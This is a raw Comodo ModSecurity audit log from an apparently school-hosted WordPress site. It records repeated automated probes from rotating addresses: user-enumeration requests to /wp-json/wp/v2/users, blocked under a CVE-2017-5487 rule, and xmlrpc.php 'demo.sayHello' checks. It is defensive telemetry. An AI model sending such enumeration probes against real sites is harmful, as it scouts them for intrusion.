"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507381096774 3411 (- - -) Stopwatch2: 1747507381096774 3411; combined=2032, p1=592, p2=1408, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a998eb28-Z-- --6971ae22-A-- [18/May/2025:01:43:07 +0700] aCjYu-m4kjNN-hEbWjKfQwAAAEE 103.236.140.4 34466 103.236.140.4 8181 --6971ae22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.117 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6971ae22-C-- demo.sayHello --6971ae22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6971ae22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507387339085 5981 (- - -) Stopwatch2: 1747507387339085 5981; combined=4511, p1=596, p2=3680, p3=40, p4=55, p5=83, sr=59, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6971ae22-Z-- --0c940462-A-- [18/May/2025:01:43:25 +0700] aCjYzRKi5m5upc8uMd4wBQAAAMg 103.236.140.4 35532 103.236.140.4 8181 --0c940462-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0c940462-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c940462-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507405789518 2836 (- - -) Stopwatch2: 1747507405789518 2836; combined=1238, p1=425, p2=782, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c940462-Z-- --6510f867-A-- [18/May/2025:01:43:33 +0700] aCjY1QTOsBn9MSWb6WLZ-gAAAI0 103.236.140.4 36074 103.236.140.4 8181 --6510f867-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.139 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6510f867-C-- demo.sayHello --6510f867-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6510f867-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507413104554 5243 (- - -) Stopwatch2: 1747507413104554 5243; combined=3819, p1=497, p2=3118, p3=29, p4=31, p5=86, sr=69, sw=58, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6510f867-Z-- --2a806037-A-- [18/May/2025:01:44:06 +0700] aCjY9um4kjNN-hEbWjKgiAAAAEw 103.236.140.4 38620 103.236.140.4 8181 --2a806037-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2a806037-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a806037-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507446747839 2636 (- - -) Stopwatch2: 1747507446747839 2636; combined=1262, p1=404, p2=823, p3=0, p4=0, p5=35, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a806037-Z-- --5d107b30-A-- [18/May/2025:01:44:11 +0700] aCjY-xKi5m5upc8uMd4xMQAAANE 103.236.140.4 38946 103.236.140.4 8181 --5d107b30-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.215 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5d107b30-C-- demo.sayHello --5d107b30-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d107b30-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507451270386 4225 (- - -) Stopwatch2: 1747507451270386 4225; combined=2997, p1=508, p2=2331, p3=25, p4=25, p5=64, sr=56, sw=44, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d107b30-Z-- --575c8863-A-- [18/May/2025:01:46:15 +0700] aCjZdwTOsBn9MSWb6WLe-gAAAI4 103.236.140.4 47718 103.236.140.4 8181 --575c8863-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --575c8863-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --575c8863-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507575134456 3520 (- - -) Stopwatch2: 1747507575134456 3520; combined=2278, p1=684, p2=1554, p3=0, p4=0, p5=40, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --575c8863-Z-- --9a798319-A-- [18/May/2025:01:46:22 +0700] aCjZfhKi5m5upc8uMd40bQAAAMQ 103.236.140.4 48318 103.236.140.4 8181 --9a798319-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9a798319-C-- demo.sayHello --9a798319-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a798319-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507582920449 4570 (- - -) Stopwatch2: 1747507582920449 4570; combined=3402, p1=474, p2=2737, p3=27, p4=29, p5=79, sr=108, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a798319-Z-- --13eb337f-A-- [18/May/2025:01:48:30 +0700] aCjZ_nyxdQCiyU1ENFeliAAAAAU 103.236.140.4 57850 103.236.140.4 8181 --13eb337f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13eb337f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13eb337f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507710298287 2854 (- - -) Stopwatch2: 1747507710298287 2854; combined=1464, p1=484, p2=946, p3=0, p4=0, p5=34, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13eb337f-Z-- --4a71b400-A-- [18/May/2025:01:48:31 +0700] aCjZ_xKi5m5upc8uMd437gAAANY 103.236.140.4 57970 103.236.140.4 8181 --4a71b400-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4a71b400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a71b400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507711699649 3533 (- - -) Stopwatch2: 1747507711699649 3533; combined=1991, p1=599, p2=1360, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a71b400-Z-- --9ec4a353-A-- [18/May/2025:01:48:37 +0700] aCjaBXyxdQCiyU1ENFelxgAAAAU 103.236.140.4 58424 103.236.140.4 8181 --9ec4a353-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9ec4a353-C-- demo.sayHello --9ec4a353-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ec4a353-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507717820915 5048 (- - -) Stopwatch2: 1747507717820915 5048; combined=3718, p1=486, p2=3028, p3=34, p4=35, p5=80, sr=61, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ec4a353-Z-- --934be03b-A-- [18/May/2025:01:48:38 +0700] aCjaBnyxdQCiyU1ENFelzAAAAAY 103.236.140.4 58478 103.236.140.4 8181 --934be03b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --934be03b-C-- demo.sayHello --934be03b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --934be03b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507718414342 4717 (- - -) Stopwatch2: 1747507718414342 4717; combined=3333, p1=456, p2=2697, p3=26, p4=24, p5=74, sr=124, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --934be03b-Z-- --e8744228-A-- [18/May/2025:01:51:30 +0700] aCjasgTOsBn9MSWb6WLmfQAAAI0 103.236.140.4 43674 103.236.140.4 8181 --e8744228-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e8744228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e8744228-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507890094930 3980 (- - -) Stopwatch2: 1747507890094930 3980; combined=2206, p1=656, p2=1514, p3=0, p4=0, p5=35, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e8744228-Z-- --6a34381e-A-- [18/May/2025:01:51:38 +0700] aCjauhKi5m5upc8uMd485wAAAMI 103.236.140.4 44288 103.236.140.4 8181 --6a34381e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.94 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6a34381e-C-- demo.sayHello --6a34381e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a34381e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507898468351 5288 (- - -) Stopwatch2: 1747507898468351 5288; combined=3987, p1=658, p2=3100, p3=34, p4=34, p5=94, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a34381e-Z-- --3ce3ec4a-A-- [18/May/2025:01:51:44 +0700] aCjawOm4kjNN-hEbWjKuzQAAAEw 103.236.140.4 44760 103.236.140.4 8181 --3ce3ec4a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.153 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3ce3ec4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ce3ec4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507904298175 2310 (- - -) Stopwatch2: 1747507904298175 2310; combined=922, p1=324, p2=572, p3=0, p4=0, p5=26, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ce3ec4a-Z-- --ed378265-A-- [18/May/2025:01:51:51 +0700] aCjax-m4kjNN-hEbWjKvBAAAAFE 103.236.140.4 45346 103.236.140.4 8181 --ed378265-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.153 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ed378265-C-- demo.sayHello --ed378265-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed378265-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747507911403255 5535 (- - -) Stopwatch2: 1747507911403255 5535; combined=4096, p1=544, p2=3338, p3=34, p4=32, p5=87, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed378265-Z-- --0f489138-A-- [18/May/2025:01:51:51 +0700] aCjaxwTOsBn9MSWb6WLnDgAAAIE 103.236.140.4 45380 103.236.140.4 8181 --0f489138-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.168.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.168.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0f489138-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f489138-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747507911794807 3833 (- - -) Stopwatch2: 1747507911794807 3833; combined=2060, p1=686, p2=1328, p3=0, p4=0, p5=46, sr=160, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
